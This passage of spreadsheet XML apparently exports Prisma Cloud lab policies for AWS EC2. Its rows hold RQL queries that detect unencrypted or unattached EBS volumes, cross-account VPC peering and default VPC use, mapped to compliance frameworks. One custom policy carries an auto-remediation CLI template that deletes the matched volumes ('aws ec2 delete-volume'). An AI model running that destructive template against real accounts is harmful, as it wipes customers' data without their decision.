      <c r="AK1847" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1848">
      <c r="A1848" t="inlineStr"/>
      <c r="B1848" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1848" s="2" t="inlineStr"/>
      <c r="D1848" t="inlineStr"/>
      <c r="E1848" t="inlineStr"/>
      <c r="F1848" t="inlineStr"/>
      <c r="G1848" t="b">
        <v>0</v>
      </c>
      <c r="H18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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1848" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1848" t="inlineStr">
        <is>
          <t>test-1234</t>
        </is>
      </c>
      <c r="L1848" t="inlineStr"/>
      <c r="M1848" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1848" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1848" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1848" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1848" t="inlineStr"/>
      <c r="R1848" t="inlineStr"/>
      <c r="S1848" t="inlineStr"/>
      <c r="T1848" t="b">
        <v>0</v>
      </c>
      <c r="U1848" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1848" t="inlineStr">
        <is>
          <t>aws-ec2-describe-volumes</t>
        </is>
      </c>
      <c r="W1848" t="inlineStr"/>
      <c r="X1848" t="inlineStr"/>
      <c r="Y1848" t="inlineStr"/>
      <c r="Z1848" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-volumes' AND cloud.type='aws' AND json.rule = (attachments[*] exists AND attachments[*].state contains "attached") and encrypted is false</t>
        </is>
      </c>
      <c r="AA1848" t="inlineStr">
        <is>
          <t>Prakash Kumar</t>
        </is>
      </c>
      <c r="AB1848" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1848" t="inlineStr"/>
      <c r="AD1848" t="b">
        <v>0</v>
      </c>
      <c r="AE1848" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1848" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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8" t="inlineStr">
        <is>
          <t>0db07855-e307-41ab-bae6-f7a913c93feb</t>
        </is>
      </c>
      <c r="AI1848" t="inlineStr">
        <is>
          <t>eb869448-3b2f-45f6-a9f8-80a8e2eaab7f</t>
        </is>
      </c>
      <c r="AJ1848" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1848" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1849">
      <c r="A1849" t="inlineStr"/>
      <c r="B1849" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1849" s="2" t="inlineStr"/>
      <c r="D1849" t="inlineStr"/>
      <c r="E1849" t="inlineStr"/>
      <c r="F1849" t="inlineStr"/>
      <c r="G1849" t="b">
        <v>0</v>
      </c>
      <c r="H1849"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49" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1849" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1849" t="inlineStr">
        <is>
          <t>Test_Porsche</t>
        </is>
      </c>
      <c r="L1849" t="inlineStr"/>
      <c r="M1849" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1849" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1849" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1849" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1849" t="inlineStr"/>
      <c r="R1849" t="inlineStr"/>
      <c r="S1849" t="inlineStr"/>
      <c r="T1849" t="b">
        <v>0</v>
      </c>
      <c r="U1849" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1849" t="inlineStr">
        <is>
          <t>aws-ec2-describe-volumes</t>
        </is>
      </c>
      <c r="W1849" t="inlineStr"/>
      <c r="X1849" t="inlineStr"/>
      <c r="Y1849" t="inlineStr"/>
      <c r="Z1849" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.account = 'pcs-aws-lab01' AND api.name = 'aws-ec2-describe-volumes' AND json.rule = encrypted is true</t>
        </is>
      </c>
      <c r="AA1849" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1849" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1849" t="inlineStr"/>
      <c r="AD1849" t="b">
        <v>0</v>
      </c>
      <c r="AE1849" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1849" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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49" t="inlineStr">
        <is>
          <t>618d7ba7-fbda-40fa-9490-992c8859cdd7</t>
        </is>
      </c>
      <c r="AI1849" t="inlineStr">
        <is>
          <t>ea125310-534d-41f6-8163-b8c8fb2abc79</t>
        </is>
      </c>
      <c r="AJ1849" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1849" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1850">
      <c r="A1850" t="inlineStr">
        <is>
          <t>Customizsed EBS volumes</t>
        </is>
      </c>
      <c r="B1850" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1850" s="2" t="inlineStr"/>
      <c r="D1850" t="inlineStr"/>
      <c r="E1850" t="inlineStr"/>
      <c r="F1850" t="inlineStr"/>
      <c r="G1850" t="b">
        <v>0</v>
      </c>
      <c r="H18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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1850" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1850" t="inlineStr">
        <is>
          <t>All ebs volumes</t>
        </is>
      </c>
      <c r="L1850" t="inlineStr"/>
      <c r="M1850" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1850" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1850" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1850" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1850" t="inlineStr">
        <is>
          <t>Not enough volume</t>
        </is>
      </c>
      <c r="R1850" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="S1850" t="inlineStr"/>
      <c r="T1850" t="b">
        <v>0</v>
      </c>
      <c r="U1850" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1850" t="inlineStr">
        <is>
          <t>aws-ec2-describe-volumes</t>
        </is>
      </c>
      <c r="W1850" t="inlineStr">
        <is>
          <t>All ebs volumes</t>
        </is>
      </c>
      <c r="X1850" t="inlineStr"/>
      <c r="Y1850" t="inlineStr"/>
      <c r="Z1850" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-volumes' and resource.status = Active AND json.rule = state equals "available"</t>
        </is>
      </c>
      <c r="AA1850" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1850" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1850" t="inlineStr"/>
      <c r="AD1850" t="b">
        <v>0</v>
      </c>
      <c r="AE1850" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1850" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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0" t="inlineStr">
        <is>
          <t>5609563c-f294-4c15-9405-270a09cbf615</t>
        </is>
      </c>
      <c r="AI1850" t="inlineStr">
        <is>
          <t>bb180778-e80b-4dda-b755-55017c86bd68</t>
        </is>
      </c>
      <c r="AJ1850" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1850" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1851">
      <c r="A1851" t="inlineStr"/>
      <c r="B1851" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1851" s="2" t="inlineStr"/>
      <c r="D1851" t="inlineStr"/>
      <c r="E1851" t="inlineStr"/>
      <c r="F1851" t="inlineStr"/>
      <c r="G1851" t="b">
        <v>0</v>
      </c>
      <c r="H18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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1851" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1851" t="inlineStr">
        <is>
          <t>Config RaviHCL</t>
        </is>
      </c>
      <c r="L1851" t="inlineStr"/>
      <c r="M1851" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1851" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1851" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1851" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1851" t="inlineStr"/>
      <c r="R1851" t="inlineStr"/>
      <c r="S1851" t="inlineStr">
        <is>
          <t>raviHCL,config</t>
        </is>
      </c>
      <c r="T1851" t="b">
        <v>0</v>
      </c>
      <c r="U1851" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1851" t="inlineStr">
        <is>
          <t>aws-ec2-describe-volumes</t>
        </is>
      </c>
      <c r="W1851" t="inlineStr"/>
      <c r="X1851" t="inlineStr"/>
      <c r="Y1851" t="inlineStr"/>
      <c r="Z1851" t="inlineStr">
        <is>
          <t>config from cloud.resource where resource.status = Active AND cloud.type = 'aws' AND api.name = 'aws-ec2-describe-volumes' AND json.rule = encrypted is false</t>
        </is>
      </c>
      <c r="AA1851" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1851" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1851" t="inlineStr"/>
      <c r="AD1851" t="b">
        <v>0</v>
      </c>
      <c r="AE1851" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1851" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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1" t="inlineStr">
        <is>
          <t>6f2228fa-02ca-4c8f-a30d-ddd024870d71</t>
        </is>
      </c>
      <c r="AI1851" t="inlineStr">
        <is>
          <t>c5ac36a0-243d-4ba9-bc55-06c502ababbf</t>
        </is>
      </c>
      <c r="AJ1851" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1851" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1852">
      <c r="A1852" t="inlineStr">
        <is>
          <t>mms-may-15</t>
        </is>
      </c>
      <c r="B1852" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1852" s="2" t="inlineStr"/>
      <c r="D1852" t="inlineStr"/>
      <c r="E1852" t="inlineStr"/>
      <c r="F1852" t="inlineStr"/>
      <c r="G1852" t="b">
        <v>0</v>
      </c>
      <c r="H18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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1852" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1852" t="inlineStr">
        <is>
          <t>mms-may-15</t>
        </is>
      </c>
      <c r="L1852" t="inlineStr"/>
      <c r="M1852" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1852" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1852" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1852" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1852" t="inlineStr">
        <is>
          <t>Storage</t>
        </is>
      </c>
      <c r="R1852" t="inlineStr">
        <is>
          <t>1.1</t>
        </is>
      </c>
      <c r="S1852" t="inlineStr"/>
      <c r="T1852" t="b">
        <v>0</v>
      </c>
      <c r="U1852" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1852" t="inlineStr">
        <is>
          <t>aws-ec2-describe-volumes</t>
        </is>
      </c>
      <c r="W1852" t="inlineStr"/>
      <c r="X1852" t="inlineStr"/>
      <c r="Y1852" t="inlineStr"/>
      <c r="Z1852" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-volumes' AND cloud.type='aws' AND json.rule = (attachments[*] exists AND attachments[*].state contains "attached") and encrypted is false</t>
        </is>
      </c>
      <c r="AA1852" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1852" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1852" t="inlineStr"/>
      <c r="AD1852" t="b">
        <v>0</v>
      </c>
      <c r="AE1852" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1852" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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2" t="inlineStr">
        <is>
          <t>6badcd92-5104-483e-958c-5654889ce8cc</t>
        </is>
      </c>
      <c r="AI1852" t="inlineStr">
        <is>
          <t>88fcdcdb-2e27-4c9f-a676-44fcc469f372</t>
        </is>
      </c>
      <c r="AJ1852" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1852" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1853">
      <c r="A1853" t="inlineStr">
        <is>
          <t>CIS AWS 3 Tier Web Architecture Benchmark v.1.0.0</t>
        </is>
      </c>
      <c r="B1853" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1853" s="2" t="inlineStr"/>
      <c r="D1853" t="inlineStr"/>
      <c r="E1853" t="inlineStr"/>
      <c r="F1853" t="inlineStr"/>
      <c r="G1853" t="b">
        <v>0</v>
      </c>
      <c r="H18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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1853" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1853" t="inlineStr">
        <is>
          <t>DM_TEST_Customized_Volume_policy</t>
        </is>
      </c>
      <c r="L1853" t="inlineStr"/>
      <c r="M1853" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1853" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1853" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1853" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1853" t="inlineStr">
        <is>
          <t>5</t>
        </is>
      </c>
      <c r="R1853" t="inlineStr">
        <is>
          <t>5.3</t>
        </is>
      </c>
      <c r="S1853" t="inlineStr"/>
      <c r="T1853" t="b">
        <v>1</v>
      </c>
      <c r="U1853" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1853" t="inlineStr">
        <is>
          <t>aws-ec2-describe-volumes</t>
        </is>
      </c>
      <c r="W1853" t="inlineStr"/>
      <c r="X1853" t="inlineStr">
        <is>
          <t>aws ec2 describe-volumes --query "Volumes[*].{ID:VolumeId,InstanceId:Attachments[0].InstanceId,tag:Tags[].Value}"${resourceId};  aws ec2 delete-volume --volume-id ${resourceId}</t>
        </is>
      </c>
      <c r="Y1853" t="inlineStr">
        <is>
          <t>'description': '',
'cliScriptTemplate': 'aws ec2 delete-volume --region $region  --volume-id $resourceId'</t>
        </is>
      </c>
      <c r="Z1853" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-volumes' and resource.status = Active AND json.rule = state equals "available"</t>
        </is>
      </c>
      <c r="AA1853" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1853" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1853" t="inlineStr"/>
      <c r="AD1853" t="b">
        <v>0</v>
      </c>
      <c r="AE1853" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1853" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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3" t="inlineStr">
        <is>
          <t>c376c2f6-a7d1-4feb-9c9a-782dce8925bf</t>
        </is>
      </c>
      <c r="AI1853" t="inlineStr">
        <is>
          <t>8950fcd5-de03-414a-bb64-c7252b7f2d0f</t>
        </is>
      </c>
      <c r="AJ1853" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1853" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1854">
      <c r="A1854" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, ISO 27002:2022, RBI Baseline Cyber Security and Resilience Requirements, kashan ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, NIST SP 800-172, ISO/IEC 27017:2015, NIST CSF v2.0, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), HITRUST v.9.4.2 [Deprecated], kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NIST 800-53 Rev 5, ISO/IEC 27017:2015, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2022.2.1, Copy of ACSC Information Security Manual (ISM)-clone, HIPAA, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, NIST CSF, NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CDC NIST 800-53 Rev4, MAS TRM 2021, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), CSA CCM v.4.0.1, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), TX-RAMP Level 2, ISO/IEC 27002:2013, CIS Controls v8, kfirdaus AWS Account-CS, CIS Controls v8, MLPS 2.0 (Level 2), ISO/IEC 27017:2015, CRI Profile v2.0, CSA CCM v.4.0.1, PCI DSS v3.2.1, ISO/IEC 27002:2013, SOC 2, NYDFS 23 CRR-NY 500.0, CSA CCM v.4.0.1, ISO/IEC 27001:2022, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ITSG-33, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27001:2022, ISO 27002:2022, Copy of CIS Controls v8, kfirdaus AWS Account-CS, ACSC Information Security Manual (ISM), HITRUST CSF v.9.6.0, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST SP 800-171 Revision 2, FFIEC, NIST SP 800-172, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1854" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1854" s="2" t="inlineStr"/>
      <c r="D1854" t="inlineStr"/>
      <c r="E1854" t="inlineStr"/>
      <c r="F1854" t="inlineStr"/>
      <c r="G1854" t="b">
        <v>0</v>
      </c>
      <c r="H18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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1854" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1854" t="inlineStr">
        <is>
          <t>AWS VPC allows unauthorized peering</t>
        </is>
      </c>
      <c r="L1854" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1854" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1854" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1854" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1854" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1854" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1854" t="inlineStr">
        <is>
          <t>ISM-1628</t>
        </is>
      </c>
      <c r="S1854" t="inlineStr"/>
      <c r="T1854" t="b">
        <v>0</v>
      </c>
      <c r="U1854" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1854" t="inlineStr">
        <is>
          <t>aws-ec2-describe-vpc-peering-connections</t>
        </is>
      </c>
      <c r="W1854" t="inlineStr">
        <is>
          <t>This policy identifies the VPCs which have unauthorized peering. The recommended best practice is to disallow VPC peering between two VPCs from different AWS accounts, as this potentially enables unauthorized access to private resources.</t>
        </is>
      </c>
      <c r="X1854" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS Console
2. Go to AWS VPC console at https://console.aws.amazon.com/vpc/
3. In the left navigation panel, select Peering Connection
4. Choose the reported Peering Connection
5. Click on Actions and select 'Delete VPC Peering Connection'
6. click on Yes, Delete</t>
        </is>
      </c>
      <c r="Y1854" t="inlineStr"/>
      <c r="Z1854" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-vpc-peering-connections' AND json.rule = $.accepterVpcInfo.ownerId does not equal $.requesterVpcInfo.ownerId and $.status.code equals active</t>
        </is>
      </c>
      <c r="AA1854" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1854" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1854" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-302</t>
        </is>
      </c>
      <c r="AD1854" t="b">
        <v>1</v>
      </c>
      <c r="AE1854" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1854" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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4" t="inlineStr">
        <is>
          <t>2e5e5b6e-584c-43e7-a8e1-2b66abb74da9</t>
        </is>
      </c>
      <c r="AI1854" t="inlineStr">
        <is>
          <t>8ec2f883-a80b-4a2d-b71f-93f95d36f522</t>
        </is>
      </c>
      <c r="AJ1854" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1854" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1855">
      <c r="A1855" t="inlineStr">
        <is>
          <t>Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B1855" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1855" s="2" t="inlineStr"/>
      <c r="D1855" t="inlineStr"/>
      <c r="E1855" t="inlineStr"/>
      <c r="F1855" t="inlineStr"/>
      <c r="G1855" t="b">
        <v>1</v>
      </c>
      <c r="H18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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1855" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1855" t="inlineStr">
        <is>
          <t>AWS Default VPC is being used</t>
        </is>
      </c>
      <c r="L1855" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1855" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1855" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1855" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1855" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1855" t="inlineStr">
        <is>
          <t>Asset Management</t>
        </is>
      </c>
      <c r="R1855" t="inlineStr">
        <is>
          <t>AST-02.5:Network Access Control (NAC)</t>
        </is>
      </c>
      <c r="S1855" t="inlineStr"/>
      <c r="T1855" t="b">
        <v>0</v>
      </c>
      <c r="U1855" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1855" t="inlineStr">
        <is>
          <t>aws-ec2-describe-vpcs</t>
        </is>
      </c>
      <c r="W1855" t="inlineStr">
        <is>
          <t>This policy identifies AWS Default VPCs that are being used.
AWS creates a default VPC automatically upon the creation of your AWS account with a default security group and network access control list (NACL). Using AWS default VPC can lead to limited customization and security concerns due to shared resources and potential misconfigurations, hindering scalability and optimal resource management.
As a best practice, using a custom VPC with specific security and network configuration provides greater flexibility and control over your architecture.</t>
        </is>
      </c>
      <c r="X1855" t="inlineStr">
        <is>
          <t>It is recommended to remove association with the default VPC and create a new custom VPC configuration based on your security and networking requirements, and associate the resource back to a newly created custom VPC.
To create a new VPC, follow below URL:
https://docs.aws.amazon.com/vpc/latest/userguide/create-vpc.html
To remove the default VPC, follow below URL:
https://docs.aws.amazon.com/vpc/latest/userguide/delete-vpc.html
NOTE: Before any modification identify and analyze the potential results of a change in the environment.</t>
        </is>
      </c>
      <c r="Y1855" t="inlineStr"/>
      <c r="Z1855" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-vpcs' AND json.rule = default is true and shared is false and state equal ignore case available as X; config from cloud.resource where api.name = 'aws-ec2-describe-network-interfaces' AND json.rule = status equal ignore case in-use as Y; filter '$.X.vpcId equals $.Y.vpcId'; show X;</t>
        </is>
      </c>
      <c r="AA1855" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1855" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1855" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-1121</t>
        </is>
      </c>
      <c r="AD1855" t="b">
        <v>1</v>
      </c>
      <c r="AE1855" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1855" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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5" t="inlineStr">
        <is>
          <t>bd7b49dc-3dbe-4ba6-bc46-3b8160a020c5</t>
        </is>
      </c>
      <c r="AI1855" t="inlineStr">
        <is>
          <t>a4a8a4bb-d8f9-4744-ae0b-545059ac484f</t>
        </is>
      </c>
      <c r="AJ1855" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1855" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1856">
      <c r="A1856" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Korea – Information Security Management System (ISMS), HITRUST CSF v.9.6.0, MAS TRM 2021, MAS TRM 2021, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, AWS Well-Architected Framework, CIS Controls v8, NIST CSF, CHC HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, Telecommunications Security Act - TSA, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST v.9.4.2 [Deprecated], CIS Controls v8.1, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.9.6.0, NIST SP 